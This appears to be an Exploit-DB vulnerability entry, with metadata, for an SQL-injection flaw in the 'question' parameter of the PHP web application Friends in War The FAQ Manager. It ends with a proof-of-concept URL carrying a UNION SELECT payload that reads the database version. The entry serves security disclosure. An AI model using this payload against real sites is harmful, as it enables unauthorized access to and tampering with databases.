Friends in War The FAQ Manager - 'question' SQL Injection
Author: unsuprise
type: webapps
platform: php
port:
date_added: 2012-11-16
date_updated: 2015-08-31
verified: 1
codes: OSVDB-87344
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/56576/info
Friends in War The FAQ Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--